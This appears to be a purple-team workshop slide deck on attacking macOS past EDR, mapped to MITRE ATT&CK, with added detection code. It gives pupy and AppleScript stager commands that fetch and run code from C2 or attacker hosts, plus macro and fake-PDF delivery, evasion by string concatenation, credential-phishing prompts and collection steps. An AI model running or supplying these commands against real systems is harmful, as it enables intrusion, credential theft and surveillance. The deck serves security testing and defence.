  • 5. Commercial in Confidence· www.digitalshadows.com5 • MacOS has two main security features that we need to be aware of: a. Gatekeeper: sets policy about which applications can be executed b. XProtect: set of malware signatures which are blacklisted • These systems are good for preventing the execution of malicious binaries which are dropped to disk (Windows tradecraft in the 2000s) • On Windows, attackers pivoted to Powershell and JS tooling a. C# is another topic entirely :) • Turns out that Python is installed by default on MacOS a. Most Linux systems too MacOS security systems
  • 6. Commercial in Confidence· www.digitalshadows.com6 • Endpoint Detection and Response (EDR) are the next-gen AV solutions • Have more advanced detection capabilities including in-memory scanning • This is particularly useful to catch (default) Mimikatz and others! • Also Response capabilities: • Memory capture from a device • Quarantine • Forensics EDR platform
  • 7. Commercial in Confidence· www.digitalshadows.com • Many vendors of software and security promise cross-platform support • Many EDR systems are cross-platform with vendors touting their ability to have coverage of Windows, MacOS, Linux and more • However, crossplatform support for security, especially for non-Windows platforms is weak at best • Even offensive toolsets often are lacking features for MacOS! • Similarly, security features in popular products, like Microsoft Office, vary drastically from platform to platform Crossplatform issues 7
  • 8. Commercial in Confidence· www.digitalshadows.com8 • Purple Team assessments are a cornerstone of how we approach security • We're big fans of the Mitre ATT&CK framework for both offensive & defensive work • You don't know how well something works until you test it • “Right or wrong, it’s very pleasant to break something from time to time.”— Fyodor Dostoevsky • Crossplatform security software is a challenge • this applies to both offensive and defensive tooling! • Python to the rescue! :) Motivation and Approach
  • 9. Commercial in Confidence· www.digitalshadows.com9 • APTs do target MacOS • Coinbase attack targeted MacOS users • APT28 had a MacOS version of X-Agent (XAgentOSX) implant • WindShift have the WindTail implant for MacOS • Lazarus Group have the AppleJeus implant for MacOS APTs
  • 10. Commercial in Confidence· www.digitalshadows.com10 “MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) is a curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary’s lifecycle and the platforms they are known to target” Mitre ATT&CK
  • 11. Commercial in Confidence· www.digitalshadows.com11 Threat emulation: try out a number of open source tools, no point re-inventing the square wheel, we're looking for effective security, not points for style. • Tool up! Install and configure the following toolkits to get started: • Empire - https://github.com/EmpireProject/Empire • Eggshell - https://github.com/neoneggplant/EggShell • EvilOSX - https://github.com/Marten4n6/EvilOSX • Pupy - https://github.com/n1nj4sec/pupy • Following steps we took (titles of section) come from the Mitre ATT&CK framework: https://attack.mitre.org/tactics/enterprise/ Planning
C2 server OS setup
• If you already have VMWare Fusion, you can use that. Otherwise:
• Install Virtualbox on your MacOS device:
  • https://download.virtualbox.org/virtualbox/6.0.8/VirtualBox-6.0.8-130520-OSX.dmg
  • Or grab it from the USB stick
• Get the Kali image:
  • https://images.offensive-security.com/virtual-images/kali-linux-2019.2-vbox-amd64.ova
  • Or grab it from the USB stick
Pupy C2 server setup
To install the Pupy server component:
• sudo apt install git libssl1.0-dev libffi-dev python-dev python-pip build-essential swig tcpdump python-virtualenv
• git clone --recursive https://github.com/n1nj4sec/pupy
• python create-workspace.py -DG pupyws
• sudo -H pip install scapy --upgrade
  • there is an installation issue with scapy 2.4.2, which pupy currently points at; 2.4.3 works though
• sudo pupyws/bin/pupysh
pupy
• By default pupy listens on port 443 for C2 callbacks
• By default pupy uses port 9000 for staging the implant
• The above can be confusing and catch people out at the beginning, especially when dealing with protected environments
• You can probably get 80 & 443 outbound to a cloud infra provider
• Create a Python one-liner for staging your pupy implant:
  • gen -f py_oneliner
• Your one-liner should look a bit like this:
  • python -c 'import urllib;exec urllib.urlopen("http://172.16.1.198:9000/d47OwioFmM/Zjlu5VIOkL").read()'
• The one-liner will download and execute pupy in-memory
Experiment! Install pupy & test the one-liner
Initial Access
Initial Access
• Our tried and true technique of spearphishing with a Macro-enabled document as an attachment (T1193) or a link (T1192) is our go-to for attacking MacOS users
• While macros can be disabled across an organization now, it requires an MDM solution to work effectively across a fleet of machines
• Certain users and functions, like payroll, often require macros to be enabled, and there is no "Trusted Locations" or signed Macro support in Office for Mac
Initial Access - Macros
• We will practice creating Macro-enabled documents in MS Office
• Note: While email filtering gateways may convert or block macro-enabled files, Spearphishing with a Link (T1192) works exceptionally well for delivering a payload to a user
• Bonus points: use a well-known file locker like Dropbox or Google Drive to host your payload
• You may need to zip up your payload to avoid prying eyes
Macro creation HOWTO
• Generate osx/macro using Empyre
  • git clone empire
  • sudo ./setup/install.sh
  • sudo ./empire
  • listeners
  • uselistener http
  • usestager osx/macro
  • Modify cmd to include (obfuscated) pupy one-liner
• OR
  • use our Macro template from the USB stick
• Pro-tip:
  • Need to add: Private Declare PtrSafe Function system Lib "/usr/lib/libc.dylib" Alias "popen" (ByVal command As String, ByVal mode As String) As LongPtr
  • A defender can block the import of the external library
  • H/T https://www.slideshare.net/DannyChrastil/pwning-in-the-sandbox-osx-macro-exploitation (slide 42)
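The "Pro-tip" above is also the defender's handle on this macro: an Office for Mac document can only reach a shell through a Declare that imports a native library, and the launcher's string-concatenation trick (mentioned later in the deck) only hides the command line from naive signatures. The following static check is an added example written for this workshop write-up, not code from the deck, the USB template, or the Empire project. It assumes the VBA source has already been extracted from the document (for instance with oletools' olevba), folds "a" & "b" fragments back together, and flags Declare statements that alias shell-launching libc exports next to auto-run entry points. The sample macro text is constructed and uses a placeholder host.

```python
import re

# Constructed sample VBA (not the workshop's template): a Declare that maps a VBA
# name onto libc popen, plus an auto-run Sub whose command line is split with "&".
SAMPLE_MACRO = r'''
Private Declare PtrSafe Function system Lib "/usr/lib/libc.dylib" Alias "popen" (ByVal command As String, ByVal mode As String) As LongPtr

Sub AutoOpen()
    Dim cmd As String
    cmd = "pyt" & "hon -c 'impo" & "rt urllib;exec urllib.urlopen(""http://EXAMPLE-C2:9000/x"").read()'"
    system cmd, "r"
End Sub
'''

# Declare statements that import a native library; Office for Mac resolves the Lib
# path on disk, which is why blocking the import works as a mitigation.
DECLARE_RE = re.compile(
    r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(?P<name>\w+)\s+Lib\s+"(?P<lib>[^"]*)"'
    r'(?:\s+Alias\s+"(?P<alias>[^"]*)")?',
    re.IGNORECASE,
)

# libc exports that hand the macro a shell or an arbitrary process launch.
RISKY_SYMBOLS = {"popen", "system", "posix_spawn", "execve", "execv", "fork"}

# Word/Excel procedure names that run without the user clicking anything.
AUTO_RUN = {"autoopen", "document_open", "auto_open", "workbook_open", "autoexec"}

# Literal concatenation: "pyt" & "hon" -> "python" once the join is removed.
CONCAT_RE = re.compile(r'"\s*&\s*"')

# Interpreter launched with inline code that fetches a URL and executes the body.
STAGER_RE = re.compile(r"python[23]?\s+-c\s+.*urlopen\(.*\)\.read\(\)", re.IGNORECASE | re.DOTALL)


def fold_string_concat(vba: str) -> str:
    """Join adjacent string literals so signatures see the whole command line."""
    return CONCAT_RE.sub("", vba)


def scan_macro(vba: str) -> dict:
    """Return structured findings for one VBA module's source text."""
    folded = fold_string_concat(vba)
    findings = {"declares": [], "risky_imports": [], "auto_run": [], "stager": False}
    for m in DECLARE_RE.finditer(folded):
        entry = {"name": m["name"], "lib": m["lib"], "alias": m["alias"] or m["name"]}
        findings["declares"].append(entry)
        if entry["alias"].lower() in RISKY_SYMBOLS or entry["name"].lower() in RISKY_SYMBOLS:
            findings["risky_imports"].append(entry)
    for m in re.finditer(r"\bSub\s+(\w+)", folded, re.IGNORECASE):
        if m.group(1).lower() in AUTO_RUN:
            findings["auto_run"].append(m.group(1))
    findings["stager"] = bool(STAGER_RE.search(folded))
    return findings


def verdict(findings: dict) -> str:
    """block: shell import reachable from auto-run; review: any native import or stager."""
    if findings["risky_imports"] and findings["auto_run"]:
        return "block"
    if findings["declares"] or findings["stager"]:
        return "review"
    return "allow"


if __name__ == "__main__":
    result = scan_macro(SAMPLE_MACRO)
    print(verdict(result), result)
```

The fold step matters more than the signature list: matching the raw module text against "python -c" would miss the split literal, while matching the folded text catches it. The verdict deliberately treats any native Declare as worth a look, since legitimate Mac macros that need libc are rare in most fleets.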
Fake PDF with AppleScript launcher
• Alternatively, use AppleScript as the launcher and use the Script Editor to create an Application. H/T TokyoNeon - https://null-byte.wonderhowto.com/how-to/hacking-macos-create-fake-pdf-trojan-with-applescript-part-2-disguising-script-0184706/
• Host this on a well-known file locker for maximum pwnage
• EDR does not have the same sensitivity to AppleScript as to PowerShell or JavaScript on Windows
• You can try to follow the tutorial on the web page or grab the pre-packaged payload from the USB stick
Fake PDF with AppleScript launcher
• The attack uses AppleScript to download and display a decoy PDF & run pupy:
  • do shell script "s=ATTACKER-IP-ADDRESS:PORT; curl -s $s/real.pdf | open -f -a Preview.app & curl -s $s/script | python -"
• You need a web server (like python -m SimpleHTTPServer 8080) to serve up the Python script and the decoy PDF
• By using tweaked icons and unicode obfuscation tricks it’s possible to make a really convincing fake PDF
• Remember to use the string concat trick in your launcher if EDR is present!
Experiment! Generate a malicious macro and/or AppleScript document
Execution
Execution
A mixture of User Execution (T1204) and Scripting (T1064) is an obvious and effective way to gain code execution
• Some tricks of the trade: you now need the full file path to call out to the system library in Office 16+
• Our first EDR detection! Turns out the vanilla Empire VBA macro is heavily signatured by our target EDR system and most likely others - does it get picked up by your EDR system?
• It seems any piece of code from the Empire toolset is picked up, not just the launcher
Bypassing EDR
• Bypass required us to go crude:
  • "If they think you're crude, go technical; if they think you're technical, go crude. I'm a very technical boy. So I decided to get as crude as possible" -- Johnny Mnemonic, William Gibson
• Practice: strip out all the "fancy" base64 encoding and execute the pupy Python one-liner directly - we've had success with this in the past
• If your EDR provider signatures the Python one-liner, with the magical powers of string concatenation we can often bypass the signature
• But we are now inside the Office sandbox - escaping it is complicated, as bypasses come and go - even without a bypass, you can still cat /etc/passwd undetected, however
  • https://www.mdsec.co.uk/2018/08/escaping-the-sandbox-microsoft-office-on-macos/ [obsolete]
  • Some people (not me!) have reported success with:
  • https://github.com/cldrn/macphish/wiki/Abusing-GrantAccessToMultipleFiles
Execution continued...
• Eggshell worked when executed directly
  • Plot twist: binaries are not checked when dropped to disk (like traditional AV), but only when they are executed - maybe a surprise to people not familiar with EDR
  • Fixed now, but the reality of modern EDR is that you can drop a 24/58 VT-scored binary onto disk and have it executed without any problems
• EvilOSX worked when executed directly
  • still does...! Although some EDR systems we have tried have detected it
Experiment! Execute the payload from the document; try Eggshell, EvilOSX, ...
Credential Access
Credential Access
Any usage of the Empire credential stealers (T1003) gets immediately flagged and blocked (process killed), even from within pupy running in-memory, as it drops the stealer to disk
• EDR is pretty good at looking for programmatic access to credential stores
• We went crude, again, this time with FiveOnceInYourLife (H/T fuzzynop) (T1056)
• Let's try it out!
  • https://github.com/fuzzynop/FiveOnceInYourLife
  • (needs to be run in a non-sandbox environment)
FiveOnceInYourLife
• Command: FOIYL.py
• Prompt the user for admin credentials for an update; users are often conditioned to do this with Slack and friends. A simple bit of AppleScript triggered by osascript is a) effective & b) undetected
• Hey Presto! Local admin creds!
Experiment! Try FiveOnceInYourLife and/or hashdump
Discovery
Discovery
If your target is domain-joined, you’ll want to do some more investigating
• The in-scope Macs are all domain-joined and we would like to recon the Active Directory environment, e.g., which groups are available (T1069) and which shares are available (T1135)
• Our Windows testing revealed that all our standard net user/net group Active Directory enumeration commands were picked up by the EDR system
• We were pleasantly surprised to discover that the MacOS-equivalent commands (dscl and dsconfigad), which return exactly the same information as their Windows cousins, were completely undetected!
• List all Domain Admins, etc.
Active Directory recon
We will not run these commands for real as we will not have an Active Directory environment available; we will review their syntax and go over the expected output
• dscl . ls /Users
• dscl . read /Users/user.mcuserface
• dscl "/Active Directory/ABC/All Domains" ls /Users
• dscl "/Active Directory/ABC/All Domains" read /Users/service_account
• dscl "/Active Directory/ABC/All Domains" ls /Computers
• dscl "/Active Directory/ABC/All Domains" read "/Computers/XYZ"
• dscl . ls /Groups
• dscl . read "/Groups/powerusers"
• dscl "/Active Directory/ABC/All Domains" ls /Groups
• dscl "/Active Directory/ABC/All Domains" read "/Groups/ABCDomain Admins"
• dsconfigad -show
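The deck's recurring finding is that the EDR under test signatured tool code but not the behaviour: the pupy staging one-liner, the AppleScript launcher's curl-pipe, the osascript credential prompt, and the dscl/dsconfigad queries above all ran undetected. Process-start telemetry catches every one of them regardless of string concatenation, because the command line an agent records is the one the shell actually received. The rule set below is an added example for this write-up, not code from the workshop or any vendor product; it runs over a constructed list of process events (hosts, paths and parent names are made up, EXAMPLE-C2 is a placeholder) and maps each hit to the ATT&CK technique ids the deck cites. It deliberately ignores local-node dscl lookups (dscl . ...), which are routine on a Mac, and only flags queries against an Active Directory node.

```python
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-start record, as an EDR or endpoint agent would log it."""
    pid: int
    parent: str   # name of the parent process
    name: str     # name of the new process
    cmdline: str  # full command line


# Constructed sample telemetry: one event per workshop step, plus benign events.
SAMPLE_EVENTS = [
    ProcEvent(201, "Microsoft Word", "sh",
              "/bin/sh -c python -c 'import urllib;exec urllib.urlopen(\"http://EXAMPLE-C2:9000/STAGE/PATH\").read()'"),
    ProcEvent(202, "sh", "python",
              "python -c import urllib;exec urllib.urlopen(\"http://EXAMPLE-C2:9000/STAGE/PATH\").read()"),
    ProcEvent(203, "Fake-PDF-applet", "sh",
              "/bin/sh -c s=EXAMPLE-C2:8080; curl -s $s/real.pdf | open -f -a Preview.app & curl -s $s/script | python -"),
    ProcEvent(204, "python", "osascript",
              "osascript -e 'display dialog \"Software Update requires your password\" default answer \"\" with hidden answer'"),
    ProcEvent(205, "python", "dscl", 'dscl "/Active Directory/ABC/All Domains" ls /Groups'),
    ProcEvent(206, "python", "dsconfigad", "dsconfigad -show"),
    ProcEvent(301, "Terminal", "python3", "python3 -m http.server 8000"),       # benign
    ProcEvent(302, "Terminal", "dscl", "dscl . read /Users/user.mcuserface"),   # benign local lookup
    ProcEvent(303, "Microsoft Word", "Microsoft AutoUpdate", "Microsoft AutoUpdate --check"),
]

OFFICE_APPS = {"Microsoft Word", "Microsoft Excel", "Microsoft PowerPoint", "Microsoft Outlook"}
INTERPRETERS = {"sh", "bash", "zsh", "python", "python2", "python3", "osascript", "curl"}

# Interpreter given inline code that downloads and executes a remote body.
STAGER_RE = re.compile(r"\bpython[23]?\b.*\s-c\s.*urlopen\(.*\)\.read\(\)", re.IGNORECASE)
# curl output piped straight into an interpreter (the AppleScript launcher pattern).
CURL_PIPE_RE = re.compile(r"\bcurl\b[^|]*\|\s*(?:python[23]?|sh|bash|zsh)\b", re.IGNORECASE)
# AppleScript dialog collecting a hidden/password answer.
PROMPT_RE = re.compile(r"display dialog.*(?:hidden answer|password)", re.IGNORECASE | re.DOTALL)


def rule_office_child(ev):
    if ev.parent in OFFICE_APPS and ev.name in INTERPRETERS:
        return "office_spawns_interpreter", "T1204/T1064"


def rule_inline_stager(ev):
    if STAGER_RE.search(ev.cmdline):
        return "inline_url_stager", "T1064"


def rule_curl_pipe(ev):
    if CURL_PIPE_RE.search(ev.cmdline):
        return "curl_piped_to_interpreter", "T1064"


def rule_cred_prompt(ev):
    if ev.name == "osascript" and PROMPT_RE.search(ev.cmdline):
        return "osascript_credential_prompt", "T1056"


def rule_ad_enum(ev):
    if ev.name == "dscl" and "/Active Directory/" in ev.cmdline:
        return "directory_service_ad_enum", "T1069/T1135"
    if ev.name == "dsconfigad" and "-show" in ev.cmdline.split():
        return "directory_service_ad_enum", "T1069/T1135"


RULES = [rule_office_child, rule_inline_stager, rule_curl_pipe, rule_cred_prompt, rule_ad_enum]


def evaluate(events):
    """Run every rule over every event; one alert per (event, rule) hit."""
    alerts = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                alerts.append({"pid": ev.pid, "name": ev.name, "parent": ev.parent,
                               "rule": hit[0], "technique": hit[1]})
    return alerts


def summarize(alerts):
    """Alert count per rule id."""
    return Counter(a["rule"] for a in alerts)


if __name__ == "__main__":
    for a in evaluate(SAMPLE_EVENTS):
        print(a)
```

Two of the rules key on parent/child relationships rather than strings (an Office app spawning a shell, osascript spawned by an interpreter), which is where the "string concat trick" gives an attacker nothing. The pupy one-liner fires twice in the sample, once on the shell wrapper and once on the Python child; collapsing those into a single incident is a correlation job for whatever consumes the alerts.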
Discovery continued
EvilOSX has a function to discover the bookmarks stored by the browser, which can be helpful for revealing internal information (at least, internal system names); this was also undetected
Experiment! Try to steal bookmarks
Collection
Collection
Screen capture (T1113), webcam capture (T1125) and microphone capture (T1123) can all be performed with pupy, EvilOSX and Eggshell
• All three types of collection from all three tools were undetected
• FIN7, APT28, etc. make extensive use of this form of collection
• We will try different types of collection with the various tools
pupy Collection
By default pupy comes with a variety of collection scripts (called “gather”)
• help -M to list available modules
• Just type the name of the module to use it, for example:
  • screenshot (currently not working on Linux due to a dependency issue)
  • keylogger (currently not working on MacOS)
  • users
  • get_info
Experiment! Explore the different “gather” modules, e.g., keylogger
Exfiltration
Exfiltration
Web filtering is an issue, but whitelists are often overly broad
• Our favourites are big-name tech firms who also offer cloud hosting, e.g., Amazon AWS, Microsoft Azure, Google Compute Platform, etc.
• Very difficult for organizations to differentiate between legit and non-legit data flows to cloud providers
• The C2 channel works great in many cases (T1041)
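Since destination-based allow-listing cannot separate exfiltration from ordinary SaaS traffic to the same provider ranges, the practical control is volumetric: baseline how much each host normally pushes to cloud address space on 80/443 and flag hosts that blow past the fleet median. The script below is an added example for this write-up, not tooling from the workshop; it uses constructed RFC 5737 test prefixes in place of a provider's published IP ranges and a constructed hour of flow records in which one host ships roughly 48 MB to a single cloud address while the rest send a few hundred KB.

```python
import ipaddress
from collections import defaultdict
from statistics import median

# Constructed stand-ins for cloud-provider address space; a real deployment would
# load the providers' published prefix lists here.
CLOUD_PREFIXES = {
    ipaddress.ip_network("203.0.113.0/24"): "cloud-provider-A",
    ipaddress.ip_network("198.51.100.0/24"): "cloud-provider-B",
}

# Constructed one-hour flow summary: (source host, destination IP, destination port, bytes out).
FLOWS = [
    ("mac-eng-01", "203.0.113.10", 443, 180_000),
    ("mac-eng-01", "198.51.100.20", 443, 240_000),
    ("mac-eng-02", "203.0.113.11", 443, 320_000),
    ("mac-eng-02", "192.0.2.53", 53, 4_000),            # not cloud, not web: ignored
    ("mac-sales-03", "198.51.100.21", 80, 150_000),
    ("mac-sales-03", "203.0.113.12", 443, 410_000),
    ("mac-hr-04", "203.0.113.10", 443, 275_000),
    ("mac-finance-07", "203.0.113.10", 443, 16_000_000),
    ("mac-finance-07", "203.0.113.10", 443, 17_500_000),
    ("mac-finance-07", "203.0.113.10", 443, 15_000_000),
    ("mac-finance-07", "198.51.100.20", 443, 200_000),
]


def cloud_provider(dst_ip):
    """Provider label for a destination address, or None if it is not cloud space."""
    addr = ipaddress.ip_address(dst_ip)
    for net, provider in CLOUD_PREFIXES.items():
        if addr in net:
            return provider
    return None


def cloud_egress(flows):
    """Bytes sent per host to cloud destinations over web ports, broken down by destination."""
    per_host = defaultdict(lambda: defaultdict(int))
    for host, dst, port, nbytes in flows:
        if port in (80, 443) and cloud_provider(dst):
            per_host[host][dst] += nbytes
    return per_host


def find_outliers(flows, factor=5, min_bytes=1 << 20):
    """Hosts whose cloud egress exceeds both an absolute floor and factor x the fleet median."""
    per_host = cloud_egress(flows)
    if not per_host:
        return []
    totals = {host: sum(dsts.values()) for host, dsts in per_host.items()}
    baseline = median(totals.values())   # median, so one exfiltrating host cannot drag it up
    findings = []
    for host, total in sorted(totals.items()):
        if total < min_bytes or total <= factor * baseline:
            continue
        top_dst, top_bytes = max(per_host[host].items(), key=lambda kv: kv[1])
        findings.append({
            "host": host,
            "cloud_bytes": total,
            "ratio_to_median": round(total / baseline, 1),
            "top_dst": top_dst,
            "top_dst_share": round(top_bytes / total, 2),
            "provider": cloud_provider(top_dst),
        })
    return findings


if __name__ == "__main__":
    for f in find_outliers(FLOWS):
        print(f)
```

The absolute floor stops a quiet fleet from generating alerts over a few kilobytes, and the median keeps the baseline honest when the outlier itself is the largest sender. Reporting the dominant destination and its share gives the responder a single address to pivot on when the provider range is shared by thousands of tenants.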
Experiment! Try to exfil a file with pupy
Command and Control
Command and Control
• HTTPS is an obvious favourite (T1071)
• We'll review the different options present in the tools
• Self-signed certs will get you caught
  • Let's Encrypt to the rescue? (Future Work for keen attendees!)
• SSL Interception can still catch you out
• If you're lucky, the targets will drop off of the corporate network or the VPN
Wrap-up
Conclusions
• True feature parity across platforms is a myth
• MacOS is typically underserved by both cross-platform software and security
• We got T-shirts, but many questions still remain about EDR effectiveness on MacOS
• Going crude: even really basic techniques are enough to get you success
• Once you move off of the mainstream offensive toolsets (Empire), there's plenty of options
• This workshop has walked you through the tools and processes you can use to break in and out of protected MacOS environments